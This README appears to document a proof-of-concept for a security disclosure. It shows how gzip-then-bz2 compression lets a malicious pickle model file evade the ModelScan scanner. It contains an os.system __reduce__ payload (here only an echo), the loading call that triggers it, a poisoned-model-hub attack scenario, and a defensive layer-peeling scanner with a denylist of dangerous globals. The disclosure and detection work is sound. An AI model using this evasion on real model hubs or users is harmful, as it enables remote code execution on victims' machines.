# ModelScan Bypass - Double Compression

**Security Research - ModelScan Bypass Technique**

## Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan,
Protect AI's open-source scanner for ML model files. The technique lets a malicious
pickle-based model file evade detection: the scanner never inspects the file at all.

## Technique

**Nested/double compression**

The pickle payload is compressed twice, gzip first and then bz2, and saved under the
resulting stacked extension (`.joblib.gz.bz2`).

## ModelScan Result

**SKIPPED - Scanner did not analyze this file**

## File

- `exploit_double_compression.joblib.gz.bz2`

## Reproduction Steps

### Testing with ModelScan

```bash
# Install ModelScan
pip install modelscan

# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_double_compression.joblib.gz.bz2
```

### Expected Result

SKIPPED - Scanner did not analyze this file

### Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)

```python
import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_double_compression.joblib.gz.bz2')
```

## Technical Details

This exploit uses Python's pickle `__reduce__` method for RCE:

```python
def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))
```

**Why ModelScan misses this:**

ModelScan dispatches on file extension. A file ending in `.bz2` matches none of its scanners,
so it is reported as skipped instead of having its content sniffed, both layers decompressed
and the pickle inside scanned. Note that evasion and execution are separate questions: the
skip happens because of the file name, while the payload only fires if whatever loads the
file decompresses both layers before unpickling.
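The fix on the scanner side is to stop trusting the file name. The following is an added example, not ModelScan's code and not part of this PoC repository: it builds the same pickle-then-gzip-then-bz2 layout in memory (with the harmless `echo` payload from the snippet above), shows that an extension-dispatched scanner skips it, and then scans it correctly by sniffing magic bytes, peeling every compression layer, and walking the pickle opcode stream with `pickletools` without ever unpickling. The denylist and the extension table are constructed for the example and are assumptions, not ModelScan's real lists; one detail worth noticing is that `os.system` pickles under its real module name (`posix` on Unix, `nt` on Windows), so a denylist keyed on `os` alone would miss it.

```python
"""Added example: layer-peeling pickle scanner (not ModelScan's code)."""
import bz2
import gzip
import lzma
import os
import pickle
import pickletools
import zlib

# Constructed denylist for this example. os.system pickles as posix.system
# (Unix) or nt.system (Windows), so the bare "os" entry is not enough.
DANGEROUS_GLOBALS = {
    ("os", "system"), ("posix", "system"), ("nt", "system"),
    ("subprocess", "Popen"), ("subprocess", "run"),
    ("builtins", "eval"), ("builtins", "exec"),
}

# Magic bytes -> decompressor, covering the formats joblib itself detects.
_MAGIC = (
    (b"\x1f\x8b", "gzip", gzip.decompress),
    (b"BZh", "bz2", bz2.decompress),
    (b"\xfd7zXZ\x00", "xz", lzma.decompress),
    (b"\x78\x01", "zlib", zlib.decompress),
    (b"\x78\x5e", "zlib", zlib.decompress),
    (b"\x78\x9c", "zlib", zlib.decompress),
    (b"\x78\xda", "zlib", zlib.decompress),
)


class _Harmless:
    """Same __reduce__ shape as the PoC with a harmless command. Nothing runs
    at dump time; only pickle.load would run it, and this example never loads."""

    def __reduce__(self):
        return (os.system, ('echo "RCE executed!"',))


def build_double_compressed(protocol=pickle.HIGHEST_PROTOCOL) -> bytes:
    """pickle -> gzip -> bz2, the layout the PoC file is assumed to use."""
    return bz2.compress(gzip.compress(pickle.dumps(_Harmless(), protocol=protocol)))


def build_clean_double_compressed() -> bytes:
    """Same wrapping around an ordinary dict, to check for false positives."""
    return bz2.compress(gzip.compress(pickle.dumps({"weights": [0.1, 0.2]})))


def extension_scan(filename: str) -> str:
    """Stand-in for extension-based dispatch (assumed table, not ModelScan's):
    an unrecognised final suffix means the file is skipped, content unseen."""
    handled = {".pkl", ".pickle", ".joblib", ".bin", ".pt", ".pth", ".h5", ".keras"}
    return "SCANNED" if os.path.splitext(filename)[1].lower() in handled else "SKIPPED"


def peel(data: bytes, max_layers: int = 8):
    """Strip nested compression until the bytes no longer look compressed.
    Returns (inner_bytes, layer names outermost-first). max_layers bounds
    decompression-bomb style nesting."""
    layers = []
    for _ in range(max_layers):
        for magic, name, decompress in _MAGIC:
            if data.startswith(magic):
                try:
                    data = decompress(data)
                except (OSError, EOFError, ValueError, zlib.error, lzma.LZMAError):
                    return data, layers  # magic matched but it was not a real stream
                layers.append(name)
                break
        else:
            return data, layers
    raise ValueError(f"more than {max_layers} nested compression layers")


def scan_pickle(data: bytes):
    """Walk opcodes with pickletools.genops (no execution) and return the
    denylisted globals referenced. The last two string pushes resolve
    STACK_GLOBAL; a production scanner must also model memo gets."""
    hits, strings = [], []
    for op, arg, _ in pickletools.genops(data):
        if op.name == "GLOBAL":  # protocol <= 3: "module name" in one arg
            module, name = arg.split(" ", 1)
            if (module, name) in DANGEROUS_GLOBALS:
                hits.append((module, name))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:  # protocol 4+
            module, name = strings[-2], strings[-1]
            if (module, name) in DANGEROUS_GLOBALS:
                hits.append((module, name))
    return hits


def scan_blob(data: bytes) -> dict:
    """Content-based scan: peel every layer, then inspect the pickle."""
    inner, layers = peel(data)
    return {"layers": layers, "findings": scan_pickle(inner)}


if __name__ == "__main__":
    print("extension dispatch:", extension_scan("exploit_double_compression.joblib.gz.bz2"))
    print("content scan:", scan_blob(build_double_compressed()))
```

Run stand-alone, the extension check returns `SKIPPED` for the PoC file name while the content scan reports layers `bz2`, `gzip` and a `system` finding; the clean dict wrapped the same way produces no finding.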

## Security Impact

**Severity**: HIGH

**Attack Vector**:
1. Attacker creates malicious model using this technique
2. Uploads to model hub (HuggingFace, etc.)
3. Victim downloads and scans with ModelScan
4. Scanner reports "No issues found!" or skips the file
5. Victim loads model → RCE

## Part of Larger Research

This is one of four bypass techniques discovered:

1. [Compression Mismatch](https://huggingface.co/sandeep1337/modelscan-bypass-compression-mismatch)
2. [Double Compression](https://huggingface.co/sandeep1337/modelscan-bypass-double-compression)
3. [Corrupt Header](https://huggingface.co/sandeep1337/modelscan-bypass-corrupt-header)
4. [Memmap Bypass ⭐](https://huggingface.co/sandeep1337/modelscan-bypass-memmap) - PRIMARY FINDING

## Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

**Date**: December 25, 2024
**Researcher**: Security Research Team

## References

- [Huntr Bug Bounty](https://huntr.com/)
- [ModelScan GitHub](https://github.com/protectai/modelscan)

## Disclaimer

⚠️ **For Security Research Only**

This file is provided for security research and vulnerability disclosure purposes only.
Do not use this technique for malicious purposes. Loading this file will execute code.

---

**Status**: Under responsible disclosure to Huntr bug bounty program